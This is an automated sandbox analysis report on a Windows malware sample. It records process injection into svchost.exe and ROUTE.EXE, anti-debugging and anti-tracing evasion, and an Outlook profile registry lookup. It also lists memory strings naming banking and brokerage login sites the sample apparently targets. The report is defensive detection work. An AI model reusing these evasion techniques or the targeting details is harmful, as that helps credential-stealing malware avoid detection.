                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: gH3LlhcRzg.exeStatic file information: File size 1187328 > 1048576
                Source: gH3LlhcRzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: gH3LlhcRzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: gH3LlhcRzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: gH3LlhcRzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: gH3LlhcRzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: gH3LlhcRzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: gH3LlhcRzg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: route.pdb source: svchost.exe, 00000002.00000003.1678399965.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711485129.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000003.1648733208.000000000127B000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000002.3226874358.0000000001267000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YLmLMhEKNXTfg.exe, 00000006.00000000.1626737870.00000000007AE000.00000002.00000001.01000000.00000005.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000000.1778157226.00000000007AE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: gH3LlhcRzg.exe, 00000000.00000003.1385199866.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, gH3LlhcRzg.exe, 00000000.00000003.1393028845.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711593848.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1605864959.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1608594134.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711593848.0000000003400000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000003.1711628069.0000000002E83000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3228296453.00000000031E0000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000003.1713625113.0000000003038000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3228296453.000000000337E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: gH3LlhcRzg.exe, 00000000.00000003.1385199866.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, gH3LlhcRzg.exe, 00000000.00000003.1393028845.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1711593848.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1605864959.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1608594134.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711593848.0000000003400000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000007.00000003.1711628069.0000000002E83000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3228296453.00000000031E0000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000003.1713625113.0000000003038000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3228296453.000000000337E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ROUTE.EXE, 00000007.00000002.3229283746.000000000380C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3226358408.0000000002C5E000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000002CFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2009532526.000000002794C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: route.pdbGCTL source: svchost.exe, 00000002.00000003.1678399965.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1711485129.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000003.1648733208.000000000127B000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000002.3226874358.0000000001267000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ROUTE.EXE, 00000007.00000002.3229283746.000000000380C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3226358408.0000000002C5E000.00000004.00000020.00020000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000002CFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2009532526.000000002794C000.00000004.80000000.00040000.00000000.sdmp
                Source: gH3LlhcRzg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: gH3LlhcRzg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: gH3LlhcRzg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: gH3LlhcRzg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: gH3LlhcRzg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CD4B37 LoadLibraryA,GetProcAddress,0_2_00CD4B37
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF06FE push es; iretd 0_2_00CF070F
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF0710 push es; iretd 0_2_00CF0727
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF072A push es; iretd 0_2_00CF0733
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF0720 push es; iretd 0_2_00CF0723
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF0739 push es; iretd 0_2_00CF0753
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF0734 push es; iretd 0_2_00CF0737
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF8945 push ecx; ret 0_2_00CF8958
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF2BDC push ds; iretd 0_2_00CF2BE2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041716A push es; retf 2_2_0041716F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004141DC push FFFFFFE3h; retf 2_2_004141EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004141E3 push FFFFFFE3h; retf 2_2_004141EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403250 push eax; ret 2_2_00403252
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041156C push eax; iretd 2_2_00411575
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413E13 push edi; retf 2_2_00413E1E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415F26 push esi; iretd 2_2_00415F2A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416F3B push esi; ret 2_2_00416F41
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004137DD pushad ; iretd 2_2_004137EA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004157FC pushfd ; ret 2_2_004157FD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx2_2_034309B6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_031E225F pushad ; ret 7_2_031E27F9
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_031E27FA pushad ; ret 7_2_031E27F9
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_032109AD push ecx; mov dword ptr [esp], ecx7_2_032109B6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_031E283D push eax; iretd 7_2_031E2858
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_031E1368 push eax; iretd 7_2_031E1369
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0072E319 push eax; iretd 7_2_0072E322
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0073058A pushad ; iretd 7_2_00730597
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_007409A3 push ebp; ret 7_2_007409B1
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_00737682 push edx; ret 7_2_0073768B
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0073BCF7 push eax; ret 7_2_0073BD0E
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_00733CE8 push esi; ret 7_2_00733CEE
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_00733F17 push es; retf 7_2_00733F1C
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CD48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00CD48D7
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D55376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00D55376
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00CF3187
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeAPI/Special instruction interceptor: Address: 13C3294
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FF90818D324
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FF90818D7E4
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FF90818D944
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FF90818D504
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FF90818D544
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FF90818D1E4
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FF908190154
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FF90818DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeAPI coverage: 4.7 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\ROUTE.EXEAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 7988Thread sleep count: 41 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 7988Thread sleep time: -82000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe TID: 8000Thread sleep time: -55000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe TID: 8000Thread sleep time: -33000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\ROUTE.EXELast function: Thread delayed
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00D3445A
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3C6D1 FindFirstFileW,FindClose,0_2_00D3C6D1
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00D3C75C
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00D3EF95
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00D3F0F2
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00D3F3F3
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00D337EF
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D33B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00D33B12
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D3BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00D3BCBC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 7_2_0073C2C0 FindFirstFileW,FindNextFileW,FindClose,7_2_0073C2C0
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CD49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00CD49A0
                Source: Ba4F6400.7.drBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: Ba4F6400.7.drBinary or memory string: global block list test formVMware20,11696497155
                Source: Ba4F6400.7.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: Ba4F6400.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: Ba4F6400.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: Ba4F6400.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: Ba4F6400.7.drBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: Ba4F6400.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: Ba4F6400.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: firefox.exe, 0000000B.00000002.2011433482.000002062795D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: ROUTE.EXE, 00000007.00000002.3226358408.0000000002C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
                Source: Ba4F6400.7.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: Ba4F6400.7.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: Ba4F6400.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: YLmLMhEKNXTfg.exe, 00000008.00000002.3227203579.0000000000C1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
                Source: Ba4F6400.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: Ba4F6400.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: Ba4F6400.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: Ba4F6400.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: Ba4F6400.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: Ba4F6400.7.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: Ba4F6400.7.drBinary or memory string: AMC password management pageVMware20,11696497155
                Source: Ba4F6400.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: Ba4F6400.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: Ba4F6400.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: Ba4F6400.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: Ba4F6400.7.drBinary or memory string: discord.comVMware20,11696497155f
                Source: Ba4F6400.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: Ba4F6400.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: Ba4F6400.7.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: Ba4F6400.7.drBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: Ba4F6400.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: Ba4F6400.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: Ba4F6400.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004174A3 LdrLoadDll,2_2_004174A3
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D43F09 BlockInput,0_2_00D43F09
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CD3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00CD3B3A
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D05A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00D05A7C
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CD4B37 LoadLibraryA,GetProcAddress,0_2_00CD4B37
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_013C3500 mov eax, dword ptr fs:[00000030h]0_2_013C3500
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_013C3560 mov eax, dword ptr fs:[00000030h]0_2_013C3560
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_013C1E70 mov eax, dword ptr fs:[00000030h]0_2_013C1E70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]2_2_034FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]2_2_034D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350634F mov eax, dword ptr fs:[00000030h]2_2_0350634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]2_2_034D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]2_2_0342C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]2_2_03450310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h]2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]2_2_034EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]2_2_034B63C0
